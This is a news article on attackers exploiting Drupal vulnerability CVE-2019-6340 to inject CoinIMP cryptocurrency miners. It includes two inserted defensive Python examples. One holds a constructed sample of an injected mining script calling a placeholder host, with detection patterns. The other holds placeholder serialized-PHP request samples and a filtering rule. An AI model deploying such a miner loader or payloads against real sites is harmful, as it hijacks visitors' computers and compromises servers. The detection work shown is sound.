Cryptocurrency Miners Exploit Latest Drupal Flaw

Here's what a Drupal hack looks like: An attacker can exploit a Drupal flaw by using a POST command to submit a specially crafted link, even if the user is not authenticated, to remotely execute arbitrary code. (Source: Trend Micro)

Hackers wasted little time before trying to turn a "highly critical" vulnerability in the Drupal content management system to their advantage.

"We've found dozens of attack attempts aimed at dozens of websites that belong to our customers using this exploit, including sites in government and the financial services industry," Edi Kogan, a researcher at security firm Imperva, says in a blog post.

"There were a few interesting payloads in the most recent attacks," he adds. "One payload tries to inject a JavaScript cryptocurrency - monero and webchain - miner named CoinIMP into an attacked site's index.php file so that site visitors will run the mining script when they browse the site's main page, for the attacker's financial benefit."

Here's CoinIMP's client-side embedded script, which uses a 64-character key. An attacker generates a key using the CoinIMP control panel and includes it in the maliciously deployed mining script so that they receive any cryptocurrency-mining proceeds. (Source: Imperva)

The index.php file is the first file loaded whenever someone visits a Drupal website. Cryptocurrency mining malware, meanwhile, refers to any code that uses an infected system's CPUs to "mine" for cryptocurrency by solving computational challenges that build the virtual currency's blockchain in return for a potential reward (see: Malware Moves: Attackers Retool for Cryptocurrency Theft).
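Because the injection described above lands in a single, normally stable file, a site owner can catch it with a file-integrity check combined with a scan for inline script tags that carry miner indicators such as a 64-character client key. The following is an added example (not code from the article, Imperva, or the Drupal project) written from the defender's side; the index.php contents, the hostname miner.example and the 64-character key are constructed placeholders modelled on the article's description, not a real CoinIMP snippet.

```python
import hashlib
import re
from pathlib import Path

# Constructed sample: a trimmed Drupal-style index.php before and after an
# injected browser-mining script. The script URL and key are placeholders.
CLEAN_INDEX_PHP = """<?php
use Drupal\\Core\\DrupalKernel;
use Symfony\\Component\\HttpFoundation\\Request;
$autoloader = require_once 'autoload.php';
"""

INJECTED_INDEX_PHP = CLEAN_INDEX_PHP + """?>
<script src="https://miner.example/lib/coinimp.min.js"></script>
<script>
var _client = new Client.Anonymous('0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef', {throttle: 0.5});
_client.start();
</script>
"""

# Any <script>...</script> block, including multi-line ones.
SCRIPT_TAG = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)
# A quoted 64-character lowercase hex string, the key length the article describes.
HEX_KEY_64 = re.compile(r"['\"]([0-9a-f]{64})['\"]")
# Case-insensitive substrings that commonly appear in browser-mining loaders.
MINER_HINTS = ("coinimp", "client.anonymous", "webchain", "monero", ".start(")


def find_miner_scripts(php_source: str) -> list[dict]:
    """Return one finding per <script> block that looks like a mining loader."""
    findings = []
    for match in SCRIPT_TAG.finditer(php_source):
        block = match.group(0)
        lowered = block.lower()
        hints = [h for h in MINER_HINTS if h in lowered]
        keys = HEX_KEY_64.findall(block)
        if hints or keys:
            findings.append({"offset": match.start(), "hints": hints, "keys": keys})
    return findings


def baseline_digest(php_source: str) -> str:
    """SHA-256 of the file as deployed; record this right after a clean install."""
    return hashlib.sha256(php_source.encode("utf-8")).hexdigest()


def check_index_php(php_source: str, known_good_digest: str) -> dict:
    """Combine the integrity check with the content scan so either one raises an alert."""
    return {
        "digest_matches": baseline_digest(php_source) == known_good_digest,
        "miner_findings": find_miner_scripts(php_source),
    }


def scan_tree(docroot: str, baselines: dict[str, str]) -> dict[str, dict]:
    """Check every PHP file under a web root against recorded baseline digests."""
    results = {}
    for path in Path(docroot).rglob("*.php"):
        rel = path.relative_to(docroot).as_posix()
        results[rel] = check_index_php(path.read_text(errors="replace"), baselines.get(rel, ""))
    return results


if __name__ == "__main__":
    good = baseline_digest(CLEAN_INDEX_PHP)
    for label, source in (("clean", CLEAN_INDEX_PHP), ("injected", INJECTED_INDEX_PHP)):
        print(label, check_index_php(source, good))
```

In practice the baseline digests would be recorded from a freshly deployed release (for example by hashing every file under the web root and storing the map outside the server), and `scan_tree` would run from cron or a monitoring agent; a digest mismatch on index.php with no corresponding deployment is worth an alert even when the content scan finds nothing.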

Critical Security Fixes

On Feb. 20, the project team behind the Drupal open source CMS software released security updates, warning that they patch a vulnerability, designated CVE-2019-6340, that attackers could use to remotely execute code and potentially take full control of a vulnerable system.

The Drupal project team recommends that all users immediately apply the updates. "Be sure to install any available security updates for contributed projects after updating Drupal core," the Drupal team says. "No core update is required for Drupal 7, but several Drupal 7 contributed modules do require updates."

Many Drupal users will need the update because the flaw exists in web services functionality. "The vulnerability affects a substantial portion of Drupal installations, since it impacts the widely installed RESTful Web Services (rest) module," Branden Lynch, a threat analyst at security firm Trend Micro, says in a blog post.

Researchers say the flaw is easy to exploit. "An attacker can submit a crafted link that references a type of shortcut and contains serialized PHP in the 'options' field for the link," Lynch says.

The link can be used to execute any command, "including downloading a web shell or establishing persistence on the target via malware or other means," he says. "All executed commands will inherit the privileges of the user running Drupal."

Mitigation Warning: Workarounds Aren't Foolproof

Lynch cautions that the exploit continues to work even for sites that have yet to install updates but have applied Drupal's recommended workarounds to at least mitigate the flaw. Those workarounds involve disabling all web services modules or else configuring services to not allow PUT, PATCH or POST requests to web services resources.

Even with such mitigations in place, "it is still possible to issue a GET request and therefore perform remote code execution, as was the case with the other HTTP methods," he warns.

Some other types of defenses, such as using web application firewalls, can block these types of attacks, he adds.
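The point Lynch makes about the workaround is easiest to see side by side: a policy that only filters by HTTP method cannot distinguish a GET that carries serialized PHP from an ordinary page view, whereas a content-inspecting rule of the kind a web application firewall applies looks at the payload regardless of method. The following is an added example written from the defender's side; it is not code from the article, Trend Micro or the Drupal project. The sample requests, their paths and the `stdClass` serialized string are constructed placeholders that show only the generic PHP serialization format, not the actual exploit payload.

```python
import json
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Markers of PHP-serialized objects or arrays, e.g. O:8:"stdClass":0:{} or a:1:{...}.
# Arriving in a request to a web services endpoint, they are a strong signal of an
# attempt to feed attacker-controlled data into unserialize().
PHP_SERIALIZED = re.compile(r'(?:O:\d+:"[^"]*":\d+:\{|a:\d+:\{)')

# Drupal's documented workaround: refuse PUT, PATCH and POST to web services resources.
BLOCKED_METHODS = {"PUT", "PATCH", "POST"}


def _strings_in(value):
    """Yield every string nested inside a decoded JSON document."""
    if isinstance(value, str):
        yield value
    elif isinstance(value, dict):
        for item in value.values():
            yield from _strings_in(item)
    elif isinstance(value, list):
        for item in value:
            yield from _strings_in(item)


def _contains_serialized_php(text: str) -> bool:
    # Check the raw text and a URL-decoded copy: the marker may be percent-encoded.
    return bool(PHP_SERIALIZED.search(text) or PHP_SERIALIZED.search(unquote_plus(text)))


def method_only_policy(req: dict) -> bool:
    """Flag solely by HTTP method, as the configuration workaround does."""
    return req["method"] in BLOCKED_METHODS


def payload_inspection(req: dict) -> bool:
    """Flag any request whose path, query string or body carries serialized PHP."""
    parts = urlsplit(req["path"])
    candidates = [parts.path, parts.query]
    for values in parse_qs(parts.query).values():
        candidates.extend(values)
    body = req.get("body", "")
    candidates.append(body)
    try:
        # JSON-encoded bodies escape the quotes, so inspect the decoded strings too.
        candidates.extend(_strings_in(json.loads(body)))
    except ValueError:
        pass
    return any(_contains_serialized_php(c) for c in candidates if c)


def evaluate(requests: list[dict]) -> list[dict]:
    """Run both rules over a batch of requests and report what each would flag."""
    return [
        {"id": r["id"], "method_only": method_only_policy(r), "inspected": payload_inspection(r)}
        for r in requests
    ]


# Constructed sample traffic (paths and payloads are illustrative, not real exploit data).
SAMPLE_REQUESTS = [
    {"id": "benign-get", "method": "GET", "path": "/node/1"},
    {"id": "benign-post", "method": "POST", "path": "/node/1", "body": '{"title":"hello"}'},
    {"id": "serialized-post", "method": "POST", "path": "/node/1",
     "body": '{"link":{"options":"O:8:\\"stdClass\\":0:{}"}}'},
    {"id": "serialized-get", "method": "GET",
     "path": "/node/1?options=O%3A8%3A%22stdClass%22%3A0%3A%7B%7D"},
]

if __name__ == "__main__":
    for row in evaluate(SAMPLE_REQUESTS):
        print(row)
```

Run as a script, the method-only rule flags both POSTs (including the harmless one) and misses the GET, while the payload rule flags exactly the two requests that carry serialized PHP. Neither rule replaces the update; the content rule is the kind of stopgap a WAF provides for the window before the patch is applied.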

On Friday, less than 48 hours after Drupal released its latest security updates, independent security researcher Troy Mursch of Bad Packets Report warned that he had already seen numerous attackers scanning for Drupal sites that were vulnerable to CVE-2019-6340.

Popular Hacking Target

Following WordPress and Joomla, Drupal is the world's third most popular content management system, commanding 4 percent market share, according to W3Techs.com.

Given Drupal's wide installation base, Imperva's Kogan says the CMS remains a popular attack target. "As always, attacks followed soon after the exploit was published. So being up to date with security updates is a must," he says.

About the Author

Schwartz is an award-winning journalist with two decades of experience in magazines, newspapers and electronic media. He has covered the information security and privacy sector throughout his career. Before joining Information Security Media Group in 2014, where he now serves as executive editor of DataBreachToday and for European news coverage, Schwartz was the information security beat reporter for InformationWeek and a frequent contributor to DarkReading, among other publications. He lives in Scotland.
